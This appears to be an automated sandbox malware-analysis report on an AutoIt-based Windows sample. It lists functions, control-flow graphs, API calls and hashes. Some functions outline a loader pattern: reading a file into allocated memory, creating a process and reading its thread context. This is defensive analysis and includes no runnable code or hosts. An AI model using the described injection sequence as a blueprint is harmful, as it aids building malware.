                                          control_flow_graph 767 903633-903681 769 9036e1-9036e3 767->769 770 903683-903686 767->770 769->770 771 9036e5 769->771 772 9036e7 770->772 773 903688-90368f 770->773 774 9036ca-9036d2 DefWindowProcW 771->774 775 9036ed-9036f0 772->775 776 93d0cc-93d0fa call 911070 call 911093 772->776 777 903695-90369a 773->777 778 90374b-903753 PostQuitMessage 773->778 785 9036d8-9036de 774->785 779 9036f2-9036f3 775->779 780 903715-90373c SetTimer RegisterWindowMessageW 775->780 814 93d0ff-93d106 776->814 782 9036a0-9036a2 777->782 783 93d154-93d168 call 962527 777->783 784 903711-903713 778->784 786 9036f9-90370c KillTimer call 90443a call 903114 779->786 787 93d06f-93d072 779->787 780->784 789 90373e-903749 CreatePopupMenu 780->789 790 903755-90375f call 9044a0 782->790 791 9036a8-9036ad 782->791 783->784 808 93d16e 783->808 784->785 786->784 793 93d074-93d076 787->793 794 93d0a8-93d0c7 MoveWindow 787->794 789->784 809 903764 790->809 797 9036b3-9036b8 791->797 798 93d139-93d140 791->798 801 93d097-93d0a3 SetFocus 793->801 802 93d078-93d07b 793->802 794->784 806 93d124-93d134 call 962d36 797->806 807 9036be-9036c4 797->807 798->774 804 93d146-93d14f call 957c36 798->804 801->784 802->807 810 93d081-93d092 call 911070 802->810 804->774 806->784 807->774 807->814 808->774 809->784 810->784 814->774 818 93d10c-93d11f call 90443a call 90434a 814->818 818->774
                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 009036D2
                                          • KillTimer.USER32(?,00000001), ref: 009036FC
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0090371F
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0090372A
                                          • CreatePopupMenu.USER32 ref: 0090373E
                                          • PostQuitMessage.USER32(00000000), ref: 0090374D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated
                                          • API String ID: 129472671-2362178303
                                          • Opcode ID: 1afd7b9dfa073285b317083ccb42604803f068c1a65e35ba6b9fcb3b5cce5f62
                                          • Instruction ID: 3166e24d33484764dc6df46cf428c86e4304e3d10f7253e887020d1e9dd7f3b3
                                          • Opcode Fuzzy Hash: 1afd7b9dfa073285b317083ccb42604803f068c1a65e35ba6b9fcb3b5cce5f62
                                          • Instruction Fuzzy Hash: 1F415BB2628509BFDB245F78EC1AF7937DDEB44300F504529F602D62E1CA66AE80A761
                                          Function 00903766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                          • API String ID: 1825951767-3513169116
                                          • Opcode ID: b443e3c83219bc1071f8ad282c4020eb0780a1f535310340f5c948fa84ec8507
                                          • Instruction ID: 8bddfe552c9cfeb4fdc095bdf7bdb2861028e784cd41802280883e53f5bcd20b
                                          • Opcode Fuzzy Hash: b443e3c83219bc1071f8ad282c4020eb0780a1f535310340f5c948fa84ec8507
                                          • Instruction Fuzzy Hash: 5BA13A72D1422D9ECB04EBA4DC91EEEB7BCBF94310F404529E426A71D1EB746A08CB60
                                          Function 01272840 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 942 1272840-12728ee call 1270230 945 12728f5-127291b call 1273750 CreateFileW 942->945 948 1272922-1272932 945->948 949 127291d 945->949 956 1272934 948->956 957 1272939-1272953 VirtualAlloc 948->957 950 1272a6d-1272a71 949->950 951 1272ab3-1272ab6 950->951 952 1272a73-1272a77 950->952 958 1272ab9-1272ac0 951->958 954 1272a83-1272a87 952->954 955 1272a79-1272a7c 952->955 959 1272a97-1272a9b 954->959 960 1272a89-1272a93 954->960 955->954 956->950 961 1272955 957->961 962 127295a-1272971 ReadFile 957->962 963 1272b15-1272b2a 958->963 964 1272ac2-1272acd 958->964 969 1272a9d-1272aa7 959->969 970 1272aab 959->970 960->959 961->950 971 1272973 962->971 972 1272978-12729b8 VirtualAlloc 962->972 967 1272b2c-1272b37 VirtualFree 963->967 968 1272b3a-1272b42 963->968 965 1272ad1-1272add 964->965 966 1272acf 964->966 973 1272af1-1272afd 965->973 974 1272adf-1272aef 965->974 966->963 967->968 969->970 970->951 971->950 975 12729bf-12729da call 12739a0 972->975 976 12729ba 972->976 979 1272aff-1272b08 973->979 980 1272b0a-1272b10 973->980 978 1272b13 974->978 982 12729e5-12729ef 975->982 976->950 978->958 979->978 980->978 983 1272a22-1272a36 call 12737b0 982->983 984 12729f1-1272a20 call 12739a0 982->984 990 1272a3a-1272a3e 983->990 991 1272a38 983->991 984->982 992 1272a40-1272a44 CloseHandle 990->992 993 1272a4a-1272a4e 990->993 991->950 992->993 994 1272a50-1272a5b VirtualFree 993->994 995 1272a5e-1272a67 993->995 994->995 995->945 995->950
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01272911
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01272B37
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateFileFreeVirtual
                                          • String ID:
                                          • API String ID: 204039940-0
                                          • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                          • Instruction ID: 8e85ec85d207d71d84015ac09c8ce221e6b64232a0adb9a4fafc53f57e854a13
                                          • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                          • Instruction Fuzzy Hash: E6A13A70E10209EBDB24DFA4C995BEEBBB5FF48304F208159E601BB281D7759A81CF94
                                          Function 009039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1073 9039d5-903a45 CreateWindowExW * 2 ShowWindow * 2
                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00903A03
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00903A24
                                          • ShowWindow.USER32(00000000,?,?), ref: 00903A38
                                          • ShowWindow.USER32(00000000,?,?), ref: 00903A41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 0476a162c03b4a59885d22bc41b9ed71b6edebfd45043320f7673e79cb65d11c
                                          • Instruction ID: b051ab742e1dc0575f08ff641a01d46dce491d858cfc5b05b22dd4fb084119cc
                                          • Opcode Fuzzy Hash: 0476a162c03b4a59885d22bc41b9ed71b6edebfd45043320f7673e79cb65d11c
                                          • Instruction Fuzzy Hash: 38F03A709256907EEB306723AC58E2B2EBDD7C6F50B02002AB910A2270C2712881EAB0
                                          Function 012725E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1074 12725e0-1272737 call 1270230 call 12724d0 CreateFileW 1081 127273e-127274e 1074->1081 1082 1272739 1074->1082 1085 1272755-127276f VirtualAlloc 1081->1085 1086 1272750 1081->1086 1083 12727ee-12727f3 1082->1083 1087 1272773-127278a ReadFile 1085->1087 1088 1272771 1085->1088 1086->1083 1089 127278e-12727c8 call 1272510 call 12714d0 1087->1089 1090 127278c 1087->1090 1088->1083 1095 12727e4-12727ec ExitProcess 1089->1095 1096 12727ca-12727df call 1272560 1089->1096 1090->1083 1095->1083 1096->1095
                                          APIs
                                            • Part of subcall function 012724D0: Sleep.KERNELBASE(000001F4), ref: 012724E1
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0127272D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: FOZSTXIVZM29AE6S90410LKP8Z7
                                          • API String ID: 2694422964-3290138862
                                          • Opcode ID: a8eb950437c68aad4324dc5159c9d6bfb119ebb360f1157b090abada7098a4c0
                                          • Instruction ID: 1f8cfcccf22217812561883848df9a0a4f10d5ccd2ad9b61a5d7f90f8ce82f0d
                                          • Opcode Fuzzy Hash: a8eb950437c68aad4324dc5159c9d6bfb119ebb360f1157b090abada7098a4c0
                                          • Instruction Fuzzy Hash: 4C618F30D14288DBEF11DBA4C954BEFBBB89F15304F004199E248BB2C1D7B91B49CBA6
                                          Function 0090407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1098 90407c-904092 1099 904098-9040ad call 907a16 1098->1099 1100 90416f-904173 1098->1100 1103 9040b3-9040d3 call 907bcc 1099->1103 1104 93d3c8-93d3d7 LoadStringW 1099->1104 1107 93d3e2-93d3fa call 907b2e call 906fe3 1103->1107 1108 9040d9-9040dd 1103->1108 1104->1107 1118 9040ed-90416a call 922de0 call 90454e call 922dbc Shell_NotifyIconW call 905904 1107->1118 1119 93d400-93d41e call 907cab call 906fe3 call 907cab 1107->1119 1110 9040e3-9040e8 call 907b2e 1108->1110 1111 904174-90417d call 908047 1108->1111 1110->1118 1111->1118 1118->1100 1119->1118
                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0093D3D7
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          • _memset.LIBCMT ref: 009040FC
                                          • _wcscpy.LIBCMT ref: 00904150
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00904160
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                          • String ID: Line:
                                          • API String ID: 3942752672-1585850449
                                          • Opcode ID: b2bae31c1f16faa97cb3afb15bfbc27fb8b8ec3863fa7f92b4c2cf746c0bb251
                                          • Instruction ID: a2865cbdee40be8fc93cf5c46fe8200f6329106ea211e48eb45ca31bd951878f
                                          • Opcode Fuzzy Hash: b2bae31c1f16faa97cb3afb15bfbc27fb8b8ec3863fa7f92b4c2cf746c0bb251
                                          • Instruction Fuzzy Hash: 2331B27140C305AFD320EB60EC45FDB77ECAF94314F10491AF695921E1DB74A688CB92
                                          Function 0090686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1133 90686a-906891 call 904ddd 1136 93e031-93e041 call 96955b 1133->1136 1137 906897-9068a5 call 904ddd 1133->1137 1141 93e046-93e048 1136->1141 1137->1136 1142 9068ab-9068b1 1137->1142 1143 93e067-93e0af call 920db6 1141->1143 1144 93e04a-93e04d call 904e4a 1141->1144 1146 93e052-93e061 call 9642f8 1142->1146 1147 9068b7-9068d9 call 906a8c 1142->1147 1153 93e0b1-93e0bb 1143->1153 1154 93e0d4 1143->1154 1144->1146 1146->1143 1156 93e0cf-93e0d0 1153->1156 1157 93e0d6-93e0e9 1154->1157 1158 93e0d2 1156->1158 1159 93e0bd-93e0cc 1156->1159 1160 93e260-93e263 call 922d55 1157->1160 1161 93e0ef 1157->1161 1158->1157 1159->1156 1164 93e268-93e271 call 904e4a 1160->1164 1163 93e0f6-93e0f9 call 907480 1161->1163 1167 93e0fe-93e120 call 905db2 call 9673e9 1163->1167 1171 93e273-93e283 call 907616 call 905d9b 1164->1171 1176 93e122-93e12f 1167->1176 1177 93e134-93e13e call 9673d3 1167->1177 1184 93e288-93e2b8 call 95f7a1 call 920e2c call 922d55 call 904e4a 1171->1184 1179 93e227-93e237 call 90750f 1176->1179 1186 93e140-93e153 1177->1186 1187 93e158-93e162 call 9673bd 1177->1187 1179->1167 1189 93e23d-93e247 call 90735d 1179->1189 1184->1171 1186->1179 1196 93e176-93e180 call 905e2a 1187->1196 1197 93e164-93e171 1187->1197 1195 93e24c-93e25a 1189->1195 1195->1160 1195->1163 1196->1179 1203 93e186-93e19e call 95f73d 1196->1203 1197->1179 1208 93e1c1-93e1c4 1203->1208 1209 93e1a0-93e1bf call 907de1 call 905904 1203->1209 1211 93e1f2-93e1f5 1208->1211 1212 93e1c6-93e1e1 call 907de1 call 906839 call 905904 1208->1212 1233 93e1e2-93e1f0 call 905db2 1209->1233 1214 93e1f7-93e200 call 95f65e 1211->1214 1215 93e215-93e218 call 96737f 1211->1215 1212->1233 1214->1184 1225 93e206-93e210 call 920e2c 1214->1225 1222 93e21d-93e226 call 920e2c 1215->1222 1222->1179 1225->1167 1233->1222
                                          APIs
                                            • Part of subcall function 00904DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00904E0F
                                          • _free.LIBCMT ref: 0093E263
                                          • _free.LIBCMT ref: 0093E2AA
                                            • Part of subcall function 00906A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00906BAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                          • API String ID: 2861923089-1757145024
                                          • Opcode ID: 9f951b50aed4ffbdbf6325d76127c8462744272e53f9694527125c064130519c
                                          • Instruction ID: 553d551a0ae33f4c3512a35d48687480e6085b4f3f4962c3c96eb89faebb063f
                                          • Opcode Fuzzy Hash: 9f951b50aed4ffbdbf6325d76127c8462744272e53f9694527125c064130519c
                                          • Instruction Fuzzy Hash: 96914A71904219AFCF04EFA4D891AEEB7B8FF48314F10442AE816AB2E1DB74A955CF50
                                          Function 009035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,009035A1,SwapMouseButtons,00000004,?), ref: 009035D4
                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,009035A1,SwapMouseButtons,00000004,?,?,?,?,00902754), ref: 009035F5
                                          • RegCloseKey.KERNELBASE(00000000,?,?,009035A1,SwapMouseButtons,00000004,?,?,?,?,00902754), ref: 00903617
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: d268454170f00d06eba184a004df81384789633b105ff62142a83b01ad10ab9d
                                          • Instruction ID: 590298238c6830107e7a116d5ccafbd076303d29ae9e81a4eca8332276c97f57
                                          • Opcode Fuzzy Hash: d268454170f00d06eba184a004df81384789633b105ff62142a83b01ad10ab9d
                                          • Instruction Fuzzy Hash: 33115771614208BFDB208F65DC81EAEBBBCEF05740F109869F805D7250E6729F40ABA0
                                          Function 012714D0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01271C8B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01271D21
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01271D43
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                          • Instruction ID: 607905a3e28f9caee9a58e9bdf2875015993a9c14504da9e505ac2d8cd9386c3
                                          • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                          • Instruction Fuzzy Hash: B8621F30A24219DBEB24DFA4C851BDEB776EF58300F1091A9D20DEB390E7759E81CB59
                                          Function 0096955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00904EE5: _fseek.LIBCMT ref: 00904EFD
                                            • Part of subcall function 00969734: _wcscmp.LIBCMT ref: 00969824
                                            • Part of subcall function 00969734: _wcscmp.LIBCMT ref: 00969837
                                          • _free.LIBCMT ref: 009696A2
                                          • _free.LIBCMT ref: 009696A9
                                          • _free.LIBCMT ref: 00969714
                                            • Part of subcall function 00922D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00929A24), ref: 00922D69
                                            • Part of subcall function 00922D55: GetLastError.KERNEL32(00000000,?,00929A24), ref: 00922D7B
                                          • _free.LIBCMT ref: 0096971C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID:
                                          • API String ID: 1552873950-0
                                          • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                          • Instruction ID: b090c0bb9f11d14cac7fb93888c1629e1b01c524080cccce82a6aa62001714bf
                                          • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                          • Instruction Fuzzy Hash: 195151B1D04259AFDF249F64DC81B9EBBB9EF88300F10449EF609A3281DB715A90CF58
                                          Function 0092470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                          • Instruction ID: bbbee411303fd2932bf2f9dd3222bc82142546ae5596a15c73af1bd8d4ec31b5
                                          • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                          • Instruction Fuzzy Hash: 9641D675B007669BDB18CF69F8809AE7BBDEF85360B24853DE829C7648D770DD408B40
                                          Function 009044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 009044CF
                                            • Part of subcall function 0090407C: _memset.LIBCMT ref: 009040FC
                                            • Part of subcall function 0090407C: _wcscpy.LIBCMT ref: 00904150
                                            • Part of subcall function 0090407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00904160
                                          • KillTimer.USER32(?,00000001,?,?), ref: 00904524
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00904533
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0093D4B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                          • String ID:
                                          • API String ID: 1378193009-0
                                          • Opcode ID: c1c16dd60bd71e5b9a113a583d045a5b89cf2f0030b57943cb4506eb38f4b37a
                                          • Instruction ID: e8c046bcdab43c4f15535339078201c80098a5fe47de72abf54945b543bf0bb7
                                          • Opcode Fuzzy Hash: c1c16dd60bd71e5b9a113a583d045a5b89cf2f0030b57943cb4506eb38f4b37a
                                          • Instruction Fuzzy Hash: 1921F5B0909784AFF7328B249C69BE6BBECAF01308F04049DF79A962D1C3742984DB41
                                          Function 00907285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0093EA39
                                          • GetOpenFileNameW.COMDLG32(?), ref: 0093EA83
                                            • Part of subcall function 00904750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00904743,?,?,009037AE,?), ref: 00904770
                                            • Part of subcall function 00920791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009207B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen_memset
                                          • String ID: X
                                          • API String ID: 3777226403-3081909835
                                          • Opcode ID: 21136582bfee14b141bc812cbf6ec71a34a61099376ca413fbf7b95e42228875
                                          • Instruction ID: d73772a00eec8a0c5832a24ba5bbef081f3b6fb1821afbd34f468c871487a0f3
                                          • Opcode Fuzzy Hash: 21136582bfee14b141bc812cbf6ec71a34a61099376ca413fbf7b95e42228875
                                          • Instruction Fuzzy Hash: 6A21A171A142589FCB11DFD4D845BEEBBFCAF88710F004019E408AB281DBB45989CFA1
